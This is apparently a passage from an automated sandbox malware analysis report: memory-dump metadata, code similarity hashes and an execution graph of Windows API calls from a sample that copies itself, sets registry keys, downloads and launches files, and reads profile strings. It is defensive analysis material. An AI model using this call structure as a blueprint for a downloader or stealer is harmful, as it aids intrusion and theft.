                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharFreeLowerString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2335467167-0
                                                                                                                                                                                                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID: -
                                                                                                                                                                                                  • API String ID: 885266447-2547889144
                                                                                                                                                                                                  • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: "URL"
                                                                                                                                                                                                  • API String ID: 2525500382-1734660058
                                                                                                                                                                                                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                                                                                                                                                                                                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: "domain"
                                                                                                                                                                                                  • API String ID: 2525500382-3540696003
                                                                                                                                                                                                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                                                                                                                                                                                                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:6.8%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:1143
                                                                                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                                                                                  execution_graph 6098 404ec0 6122 40821c 6098->6122 6100 404edf 6101 404f04 6100->6101 6102 404ef4 6100->6102 6105 404efd 6100->6105 6129 40c519 6101->6129 6125 404e7b 6102->6125 6106 405111 6107 40c5b9 SysFreeString 6106->6107 6107->6105 6108 4050f2 6148 40c5b9 6108->6148 6111 40c5b9 SysFreeString 6112 405103 6111->6112 6113 40c5b9 SysFreeString 6112->6113 6114 405109 6113->6114 6115 40c5b9 SysFreeString 6114->6115 6115->6106 6116 404f0b 6116->6105 6116->6106 6116->6108 6136 40c43d 6116->6136 6119 4050e2 6145 40be3a 6119->6145 6123 408220 6122->6123 6124 408233 PathCombineW 6122->6124 6123->6124 6124->6100 6126 404e93 6125->6126 6151 408248 6126->6151 6165 40c4b4 CoCreateInstance 6129->6165 6132 40c589 6132->6116 6133 40c531 VariantInit SysAllocString 6133->6132 6135 40c551 VariantClear 6133->6135 6135->6132 6167 40bf60 6136->6167 6138 4050ce 6138->6119 6141 40c00b 6138->6141 6140 40be3a HeapFree 6140->6138 6142 40c01a 6141->6142 6144 40c03b 6141->6144 6143 40bde1 3 API calls 6142->6143 6143->6144 6144->6119 6146 40be41 HeapFree 6145->6146 6147 40be53 6145->6147 6146->6147 6147->6108 6149 40c5c0 SysFreeString 6148->6149 6150 4050fb 6148->6150 6149->6150 6150->6111 6152 40821c PathCombineW 6151->6152 6153 408268 6152->6153 6154 408272 FindFirstFileW 6153->6154 6155 404eb9 6153->6155 6154->6155 6162 408292 6154->6162 6155->6105 6156 4082a2 WaitForSingleObject 6157 4083b6 FindClose 6156->6157 6156->6162 6157->6155 6158 40839e FindNextFileW 6158->6157 6158->6162 6159 408306 PathMatchSpecW 6159->6162 6160 40821c PathCombineW 6160->6162 6161 408374 Sleep 6161->6162 6162->6156 6162->6157 6162->6158 6162->6159 6162->6160 6162->6161 6163 40833f Sleep 6162->6163 6164 408248 PathCombineW 6162->6164 6163->6162 6164->6162 6166 40c4dd 6165->6166 6166->6132 6166->6133 6169 40bf72 6167->6169 6168 40bfbf 6168->6138 6168->6140 6169->6168 6171 40bfa7 wvnsprintfW 6169->6171 6172 40bde1 6169->6172 6171->6169 6173 40bdf2 6172->6173 6174 40bde5 6172->6174 6176 40be0c HeapReAlloc 6173->6176 6177 40bdfc HeapAlloc 6173->6177 6175 40be3a HeapFree 6174->6175 6178 40bdec 6175->6178 6176->6178 6177->6178 6178->6169 6809 409402 6810 409415 6809->6810 6811 409419 6810->6811 6812 409437 SysFreeString 6810->6812 6812->6811 6813 409883 6814 409890 6813->6814 6815 409655 __VEC_memcpy 6814->6815 6816 4098ad 6815->6816 6817 409655 __VEC_memcpy 6816->6817 6818 4098c7 6816->6818 6817->6818 6179 409445 6181 40945a 6179->6181 6180 40945e 6181->6180 6182 4094a0 SysFreeString SysFreeString 6181->6182 6182->6180 5690 40b346 5736 40d5b0 5690->5736 5693 40b37e 5719 40b3db 5693->5719 5782 40ac20 RegOpenKeyExW 5693->5782 5697 40b394 GetModuleFileNameW 5790 4069fd RegCreateKeyExW 5697->5790 5702 40b3f2 Sleep 5705 40a786 35 API calls 5702->5705 5703 40b3c5 5794 40a786 5703->5794 5704 40b3ca GetLastError 5704->5703 5707 40b407 GetModuleFileNameW 5705->5707 5710 40ac20 4 API calls 5707->5710 5709 40b45c 5711 40ac20 4 API calls 5709->5711 5720 40b3d8 5710->5720 5713 40b468 5711->5713 5717 407727 54 API calls 5713->5717 5714 40b426 CopyFileW 5718 40b43f 5714->5718 5714->5719 5715 40b4b9 ExpandEnvironmentStringsW 5715->5719 5716 40b4cf GetModuleFileNameW 5716->5720 5721 40b474 5717->5721 5722 4077f0 CreateProcessW 5718->5722 5719->5702 5719->5709 5719->5715 5719->5716 5729 40b44c ExitProcess 5719->5729 5730 40b4fe GetLastError 5719->5730 5738 40b2ce OleInitialize 5719->5738 5747 40aafd 5719->5747 5756 40ab7c GetModuleFileNameW CharLowerW 5719->5756 5761 40abd9 5719->5761 5767 407727 5719->5767 5779 4077f0 5719->5779 5720->5714 5720->5719 5724 40b498 GetLastError 5721->5724 5725 40b47a 5721->5725 5726 40b44b 5722->5726 5728 40b4a3 5724->5728 5727 4077f0 CreateProcessW 5725->5727 5726->5729 5731 40b486 5727->5731 5732 40a786 35 API calls 5728->5732 5733 40a786 35 API calls 5730->5733 5731->5729 5734 40b48b GetLastError 5731->5734 5735 40b4a8 5732->5735 5733->5719 5734->5728 5735->5729 5737 40b353 GetModuleFileNameW 5736->5737 5737->5693 5740 40b2e2 5738->5740 5742 40b325 InternetCloseHandle 5740->5742 5810 407552 5740->5810 5813 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5740->5813 5818 40ac93 5740->5818 5835 40b096 5740->5835 5871 40a6c9 5742->5871 5748 40d5b0 5747->5748 5749 40ab0a GetCommandLineW 5748->5749 5750 40ab1a 5749->5750 5751 40ab1f 5750->5751 5752 40ac20 4 API calls 5750->5752 5751->5719 5753 40ab30 5752->5753 5753->5751 5754 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5753->5754 5755 40ab73 5754->5755 5755->5751 5757 40abb6 5756->5757 5758 40abc0 GetCommandLineW 5757->5758 5759 40abbb 5757->5759 5760 40abd0 5758->5760 5759->5719 5760->5719 5762 40ac20 4 API calls 5761->5762 5763 40abf2 5762->5763 5764 40abf7 FindFirstFileW 5763->5764 5765 40ac1a 5763->5765 5764->5765 5766 40ac0e FindClose 5764->5766 5765->5719 5766->5765 5768 40d5b0 5767->5768 5769 407731 GetModuleFileNameW 5768->5769 5770 407753 5769->5770 5771 40776d 5769->5771 5772 4075d4 15 API calls 5770->5772 5773 407774 ExpandEnvironmentStringsW 5771->5773 5774 407764 5771->5774 5776 4077a7 GetLastError 5771->5776 5777 4077bc GetLastError 5771->5777 5778 40a786 35 API calls 5771->5778 5772->5774 6084 4075d4 CreateFileW 5773->6084 5774->5719 5776->5771 5777->5771 5778->5771 6094 40d530 5779->6094 5781 407805 CreateProcessW 5781->5719 5783 40ac60 RegOpenKeyExW 5782->5783 5784 40ac4a 5782->5784 5786 40ac7c 5783->5786 5789 40ac78 5783->5789 6096 4069c0 RegQueryValueExW RegCloseKey 5784->6096 6097 4069c0 RegQueryValueExW RegCloseKey 5786->6097 5787 40ac5a 5787->5783 5787->5789 5789->5697 5789->5719 5791 406a30 5790->5791 5792 406a2c 5790->5792 5793 406a39 RegSetValueExW RegCloseKey 5791->5793 5792->5703 5792->5704 5793->5792 5796 40a79c 5794->5796 5798 40a7b3 5794->5798 5795 406d14 2 API calls 5795->5796 5796->5795 5797 40a79e Sleep 5796->5797 5796->5798 5797->5796 5799 406cb5 GetVersionExW 5798->5799 5800 40a83f 5799->5800 5801 4078cb 12 API calls 5800->5801 5802 40a873 5801->5802 5803 40a718 5 API calls 5802->5803 5807 40a87b 5803->5807 5804 40a744 5 API calls 5804->5807 5805 40a894 Sleep 5805->5807 5806 406e69 22 API calls 5806->5807 5807->5804 5807->5805 5807->5806 5808 40a8c7 Sleep 5807->5808 5809 40a8e1 GetProcessHeap HeapFree 5807->5809 5808->5807 5809->5720 5875 40584d 5810->5875 5812 407557 Sleep 5812->5740 5814 4073dd SystemTimeToFileTime SystemTimeToFileTime 5813->5814 5816 407432 5814->5816 5817 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5816->5817 5817->5740 5876 406d14 InternetAttemptConnect 5818->5876 5820 40aca4 5821 40aca9 Sleep 5820->5821 5822 40acbd 5820->5822 5824 406d14 2 API calls 5821->5824 5879 4078cb 5822->5879 5824->5820 5825 40acd4 5888 406cb5 GetVersionExW 5825->5888 5827 40ad09 5890 40a718 5827->5890 5830 40ad71 Sleep 5834 40ad4c 5830->5834 5832 40ad9f Sleep 5832->5834 5833 40adbc 5833->5740 5834->5830 5834->5832 5834->5833 5894 40a744 5834->5894 5898 406e69 5834->5898 5836 40b0a3 5835->5836 5837 40b0bd 5836->5837 5838 40b0cf 5836->5838 5865 40b0ae 5836->5865 6004 407995 5837->6004 6011 407951 5838->6011 5841 40b177 InternetClearAllPerSiteCookieDecisions 5844 40b17d 5841->5844 5842 40b168 InternetSetPerSiteCookieDecisionW 5842->5844 5843 40b0cd 5845 40b0fb GetModuleFileNameW 5843->5845 5857 40b155 5843->5857 6032 4032b8 5844->6032 5847 40b116 GetCurrentDirectoryW 5845->5847 5851 40b10d 5845->5851 5847->5851 5849 40b186 GetLastError 5852 40a786 35 API calls 5849->5852 5850 40b196 5853 40b1b0 CreateThread 5850->5853 5854 40b1e1 5850->5854 6016 40253c 5851->6016 5852->5850 5853->5850 5856 40b221 5854->5856 5858 40a786 35 API calls 5854->5858 5860 40b228 CloseHandle 5856->5860 5861 40b23d 5856->5861 5857->5841 5857->5842 5857->5865 5859 40b1f7 5858->5859 5859->5856 5864 40b212 WaitForMultipleObjects 5859->5864 5860->5860 5860->5861 5862 40a6c9 InternetCloseHandle 5861->5862 5863 40b242 InternetClearAllPerSiteCookieDecisions 5862->5863 5863->5865 5866 40b24d 5863->5866 5864->5856 5865->5740 5866->5865 5867 40b261 GetModuleFileNameW 5866->5867 5868 40b27c GetCurrentDirectoryW 5867->5868 5869 40b273 5867->5869 5868->5869 5870 40253c 50 API calls 5869->5870 5870->5865 5872 40a6cf 5871->5872 5873 40a6fc InternetCloseHandle 5872->5873 5874 40a716 ExitProcess 5872->5874 5873->5872 5875->5812 5877 406d22 5876->5877 5878 406d26 InternetOpenW 5876->5878 5877->5820 5878->5820 5910 407e2b 5879->5910 5882 407903 5882->5825 5884 4078ec 5884->5882 5885 4078f4 5884->5885 5922 407d61 5885->5922 5887 407900 5887->5882 5889 406cf6 5888->5889 5889->5827 5891 40a722 5890->5891 5892 40a739 5891->5892 5934 4079ff 5891->5934 5892->5834 5895 40a75d 5894->5895 5896 4079ff 5 API calls 5895->5896 5897 40a76e 5895->5897 5896->5897 5897->5834 5899 40d5b0 5898->5899 5900 406e76 GetTickCount 5899->5900 5901 406e92 5900->5901 5940 407b4e 5901->5940 5903 406f49 5949 409c99 5903->5949 5907 407017 5907->5834 5908 406ff4 5908->5907 5965 407a3c 5908->5965 5911 407e3d 5910->5911 5912 407e4e SetFilePointer ReadFile 5910->5912 5928 407cd7 5911->5928 5914 4078dd 5912->5914 5916 407e7e 5912->5916 5914->5882 5917 40782a GetModuleFileNameW CreateFileW 5914->5917 5915 407e44 5915->5912 5915->5914 5916->5914 5918 407871 GetFileTime CloseHandle 5917->5918 5919 407888 GetTickCount 5917->5919 5920 4078b0 5918->5920 5921 407893 5919->5921 5920->5884 5921->5920 5923 407d70 5922->5923 5926 407d77 5922->5926 5924 407cd7 3 API calls 5923->5924 5924->5926 5925 407d81 5925->5887 5926->5925 5927 407dfa SetFilePointer WriteFile 5926->5927 5927->5887 5929 40d5b0 5928->5929 5930 407ce4 GetModuleFileNameW 5929->5930 5931 407d0d GetCurrentDirectoryW 5930->5931 5932 407d00 5930->5932 5931->5932 5933 407d36 CreateFileW 5932->5933 5933->5915 5937 407908 5934->5937 5936 407a05 5936->5891 5938 407e2b 5 API calls 5937->5938 5939 407919 5938->5939 5939->5936 5975 407267 5940->5975 5942 407b63 5943 407e2b 5 API calls 5942->5943 5944 407b83 5942->5944 5943->5944 5944->5944 5945 407c6b 5944->5945 5980 40bcb4 5944->5980 5990 40bd55 5945->5990 5950 409ca6 5949->5950 5951 409cbb InternetOpenUrlW 5950->5951 5952 409cdf GetProcessHeap HeapAlloc 5951->5952 5953 406fe2 5951->5953 5952->5953 5954 409d5b InternetReadFile 5952->5954 5953->5907 5961 406e00 5953->5961 5955 409d79 GetProcessHeap HeapAlloc 5954->5955 5956 409d0b 5954->5956 5959 409d92 GetProcessHeap RtlFreeHeap 5955->5959 5956->5954 5956->5955 5957 409d1f GetProcessHeap HeapReAlloc 5956->5957 5960 40c5d0 __VEC_memcpy 5956->5960 5957->5953 5957->5956 5959->5953 5960->5956 5962 406e12 5961->5962 5963 40c5d0 __VEC_memcpy 5962->5963 5964 406e21 5963->5964 5964->5908 5966 407a4f 5965->5966 5967 40c5d0 __VEC_memcpy 5966->5967 5974 407b42 5966->5974 5968 407a7d 5967->5968 5969 407267 3 API calls 5968->5969 5968->5974 5970 407b17 5969->5970 5971 407267 3 API calls 5970->5971 5972 407b20 5971->5972 5973 407d61 5 API calls 5972->5973 5973->5974 5974->5907 5976 407284 5975->5976 5977 407278 GetSystemTime 5975->5977 5978 40728b SystemTimeToFileTime SystemTimeToFileTime 5976->5978 5977->5978 5979 4072e8 __aulldiv 5978->5979 5979->5942 5981 40bcd3 5980->5981 5989 40bd17 5981->5989 5996 40c5d0 5981->5996 5982 40bd3a 5983 40bd4d 5982->5983 5984 40c5d0 __VEC_memcpy 5982->5984 5983->5945 5984->5983 5986 40b51c __VEC_memcpy 5986->5989 5989->5982 5989->5986 5991 40bd5c 5990->5991 5991->5991 5992 40bd9e 5991->5992 5993 40bcb4 __VEC_memcpy 5991->5993 5994 40bcb4 __VEC_memcpy 5992->5994 5993->5992 5995 407c7c 5994->5995 5995->5903 5997 40c5e8 5996->5997 5998 40c60f __VEC_memcpy 5997->5998 5999 40bcf9 5997->5999 5998->5999 5999->5983 6000 40b51c 5999->6000 6001 40b543 6000->6001 6002 40b552 6000->6002 6003 40c5d0 __VEC_memcpy 6001->6003 6002->5989 6003->6002 6010 4079a2 6004->6010 6005 4079f1 6006 407951 36 API calls 6005->6006 6007 4079fc 6006->6007 6007->5843 6008 407e2b 5 API calls 6008->6010 6010->6005 6010->6008 6039 40791c 6010->6039 6013 407965 6011->6013 6012 407e2b 5 API calls 6012->6013 6013->6012 6014 40798e 6013->6014 6015 40791c 36 API calls 6013->6015 6014->5843 6015->6013 6018 402549 6016->6018 6017 402572 6019 402584 DeleteFileW 6017->6019 6022 40a786 35 API calls 6017->6022 6018->6017 6021 406d14 2 API calls 6018->6021 6025 402561 Sleep 6018->6025 6020 402594 6019->6020 6030 4025ba 6019->6030 6026 4025ad Sleep 6020->6026 6027 4025c1 6020->6027 6045 407036 DeleteFileW CreateFileW 6020->6045 6021->6018 6024 402581 6022->6024 6024->6019 6025->6018 6026->6020 6026->6030 6028 40a786 35 API calls 6027->6028 6031 4025d0 _memset 6027->6031 6028->6031 6029 402630 CreateProcessW 6029->6030 6030->5857 6031->6029 6056 406a68 RegOpenKeyExW 6032->6056 6037 403351 GetProcAddress GetProcAddress GetProcAddress 6038 403386 6037->6038 6038->5849 6038->5850 6040 407d61 5 API calls 6039->6040 6041 407930 6040->6041 6042 407939 GetLastError 6041->6042 6043 407949 6041->6043 6044 40a786 35 API calls 6042->6044 6043->6010 6044->6043 6046 407078 GetLastError 6045->6046 6052 40706b 6045->6052 6047 407095 InternetOpenUrlW 6046->6047 6048 407089 SetEndOfFile 6046->6048 6049 4070c6 InternetQueryDataAvailable 6047->6049 6050 4070b8 CloseHandle 6047->6050 6048->6047 6051 407119 InternetReadFile 6049->6051 6050->6052 6053 407123 CloseHandle InternetCloseHandle 6051->6053 6054 4070ed 6051->6054 6052->6020 6053->6052 6054->6053 6055 4070f2 WriteFile 6054->6055 6055->6051 6057 406a9a 6056->6057 6061 4032c4 6056->6061 6080 4069c0 RegQueryValueExW RegCloseKey 6057->6080 6059 406aaa 6060 4069fd 3 API calls 6059->6060 6059->6061 6060->6061 6062 406adf 6061->6062 6063 406aec 6062->6063 6064 406b11 RegOpenKeyExW 6063->6064 6065 406b34 6064->6065 6078 4032ce 6 API calls 6064->6078 6081 4069c0 RegQueryValueExW RegCloseKey 6065->6081 6067 406b49 6068 406b78 RegOpenKeyExW 6067->6068 6067->6078 6069 406b96 6068->6069 6070 406ba6 6068->6070 6082 4069c0 RegQueryValueExW RegCloseKey 6069->6082 6072 4069fd 3 API calls 6070->6072 6073 406bc3 6070->6073 6072->6073 6074 406c03 RegOpenKeyExW 6073->6074 6073->6078 6075 406c21 6074->6075 6079 406c31 6074->6079 6083 4069c0 RegQueryValueExW RegCloseKey 6075->6083 6077 4069fd 3 API calls 6077->6078 6078->6037 6078->6038 6079->6077 6079->6078 6080->6059 6081->6067 6082->6070 6083->6079 6085 40760a CreateFileW 6084->6085 6086 407622 6084->6086 6085->6086 6087 40762a GetFileSize GetProcessHeap HeapAlloc 6085->6087 6086->5771 6087->6086 6088 407650 ReadFile 6087->6088 6088->6086 6089 40766a 6088->6089 6089->6086 6090 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6089->6090 6093 40584d 6090->6093 6092 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6092->6086 6093->6092 6095 40d53c __VEC_memzero 6094->6095 6095->5781 6096->5787 6097->5789 6819 401006 6820 40101f 6819->6820 6821 407499 5 API calls 6820->6821 6824 4010c1 6820->6824 6822 4010ce 6821->6822 6823 407552 Sleep 6822->6823 6822->6824 6823->6824 6825 409a07 6828 409a14 6825->6828 6826 409a92 6827 409a6d SysAllocString 6827->6826 6828->6826 6828->6827 6829 403287 6830 403292 6829->6830 6831 4032aa 6829->6831 6830->6831 6833 408604 RegOpenKeyExW 6830->6833 6834 408632 6833->6834 6835 40864a GetLastError 6833->6835 6843 4069c0 RegQueryValueExW RegCloseKey 6834->6843 6837 408654 6835->6837 6838 408658 6835->6838 6837->6830 6840 408682 DeleteFileW 6838->6840 6841 40866a 6838->6841 6839 408646 6839->6835 6840->6837 6842 4069fd 3 API calls 6841->6842 6842->6837 6843->6839 6844 40ce08 6845 40ce1a 6844->6845 6847 40ce28 @_EH4_CallFilterFunc@8 6844->6847 6846 40cd66 __except_handler4 5 API calls 6845->6846 6846->6847 6848 409909 6849 409916 6848->6849 6856 409723 6849->6856 6851 409723 __VEC_memcpy 6852 4099d5 6851->6852 6853 409a02 6852->6853 6854 4099de SysAllocString SysAllocString 6852->6854 6854->6853 6855 409934 6855->6851 6855->6853 6858 409733 6856->6858 6857 409772 6857->6855 6858->6857 6859 40c5d0 __VEC_memcpy 6858->6859 6859->6857 6183 4047cc 6184 40821c PathCombineW 6183->6184 6185 4047f1 6184->6185 6186 40483b 6185->6186 6187 404800 6185->6187 6188 404843 6185->6188 6191 408248 8 API calls 6187->6191 6207 4083c4 CreateFileW 6188->6207 6191->6186 6194 404a61 6196 404a79 6194->6196 6197 404a69 VirtualFree 6194->6197 6195 40487b HeapAlloc 6199 404896 6195->6199 6196->6186 6198 404a7f CloseHandle 6196->6198 6197->6196 6198->6186 6199->6199 6200 404a4a 6199->6200 6204 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6199->6204 6206 40c00b 3 API calls 6199->6206 6223 40c3f9 6199->6223 6201 40be3a HeapFree 6200->6201 6202 404a53 6201->6202 6228 40be54 6202->6228 6204->6199 6206->6199 6208 4083ea GetFileSizeEx 6207->6208 6211 404854 6207->6211 6209 4083f9 6208->6209 6210 40844f CloseHandle 6208->6210 6209->6210 6209->6211 6212 40840e VirtualAlloc 6209->6212 6210->6211 6211->6186 6216 40c290 6211->6216 6212->6210 6213 408423 ReadFile 6212->6213 6214 408441 VirtualFree 6213->6214 6215 408439 6213->6215 6214->6210 6215->6211 6215->6214 6221 40c2b6 6216->6221 6222 40486e 6216->6222 6217 40bde1 3 API calls 6217->6221 6218 40c340 6219 40be54 HeapFree 6218->6219 6219->6222 6221->6217 6221->6218 6221->6222 6234 40c05c 6221->6234 6222->6194 6222->6195 6224 40c402 6223->6224 6225 40c407 6223->6225 6224->6199 6226 40c412 wvnsprintfW 6225->6226 6227 40c42e 6226->6227 6227->6199 6230 40be5b 6228->6230 6233 40be73 6228->6233 6229 40be3a HeapFree 6229->6230 6230->6229 6231 40be6d 6230->6231 6230->6233 6232 40be3a HeapFree 6231->6232 6232->6233 6233->6194 6235 40c066 6234->6235 6236 40c06a 6234->6236 6235->6221 6236->6235 6239 40be27 HeapAlloc 6236->6239 6238 40c086 6238->6221 6239->6238 6860 402d0e 6861 40267a 122 API calls 6860->6861 6862 402d32 6861->6862 6865 409c6f 6862->6865 6866 402d3a 6865->6866 6867 409c7a SysFreeString 6865->6867 6867->6866 6867->6867 6868 40350f 6869 40821c PathCombineW 6868->6869 6870 403531 6869->6870 6871 403540 6870->6871 6872 403553 HeapAlloc 6870->6872 6875 40354d 6870->6875 6873 4034a8 8 API calls 6871->6873 6874 403576 GetPrivateProfileStringW 6872->6874 6872->6875 6873->6875 6876 403594 6874->6876 6877 40372c 6874->6877 6876->6877 6879 4035a8 HeapAlloc 6876->6879 6878 40be3a HeapFree 6877->6878 6878->6875 6879->6877 6886 4035c5 6879->6886 6880 403627 GetPrivateProfileStringW 6881 403643 GetPrivateProfileIntW 6880->6881 6880->6886 6882 403669 GetPrivateProfileStringW 6881->6882 6881->6886 6883 40368b GetPrivateProfileStringW 6882->6883 6882->6886 6883->6886 6884 403723 6885 40be3a HeapFree 6884->6885 6885->6877 6886->6880 6886->6884 6887 40c3f9 wvnsprintfW 6886->6887 6888 40c00b 3 API calls 6886->6888 6887->6886 6888->6886 6240 40cbd0 6241 40cc08 6240->6241 6242 40cbfb 6240->6242 6244 40cd66 __except_handler4 5 API calls 6241->6244 6258 40cd66 6242->6258 6245 40cc18 __except_handler4 6244->6245 6246 40cc74 __except_handler4 6245->6246 6247 40cc9f 6245->6247 6253 40ccb5 __except_handler4 6245->6253 6246->6247 6248 40cc8f 6246->6248 6249 40cd66 __except_handler4 5 API calls 6246->6249 6250 40cd66 __except_handler4 5 API calls 6248->6250 6249->6248 6250->6247 6252 40ccf4 __except_handler4 6254 40cd2b 6252->6254 6255 40cd66 __except_handler4 5 API calls 6252->6255 6266 40ce9a RtlUnwind 6253->6266 6256 40cd66 __except_handler4 5 API calls 6254->6256 6255->6254 6257 40cd3b __except_handler4 6256->6257 6259 40cd70 IsDebuggerPresent 6258->6259 6260 40cd6e 6258->6260 6268 40d247 6259->6268 6260->6241 6263 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6264 40d0f3 __except_handler4 6263->6264 6265 40d0fb GetCurrentProcess TerminateProcess 6263->6265 6264->6265 6265->6241 6267 40ceaf 6266->6267 6267->6252 6268->6263 6895 40d990 6896 40d993 VirtualQuery 6895->6896 6898 40d9b2 6896->6898 6900 40d7d1 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6896->6900 6899 40d9cc GetVersionExA 6898->6899 6898->6900 6899->6900 6269 401652 6270 401665 6269->6270 6274 4016f6 6270->6274 6275 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6270->6275 6272 4016da 6273 407552 Sleep 6272->6273 6272->6274 6273->6274 6276 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6275->6276 6276->6272 6901 402214 6905 402233 6901->6905 6902 402386 6903 402319 6903->6902 6909 401c41 6903->6909 6905->6903 6906 408091 3 API calls 6905->6906 6906->6903 6907 402478 6907->6902 6908 408091 3 API calls 6907->6908 6908->6902 6914 401c4e 6909->6914 6910 401e07 6913 407267 3 API calls 6910->6913 6915 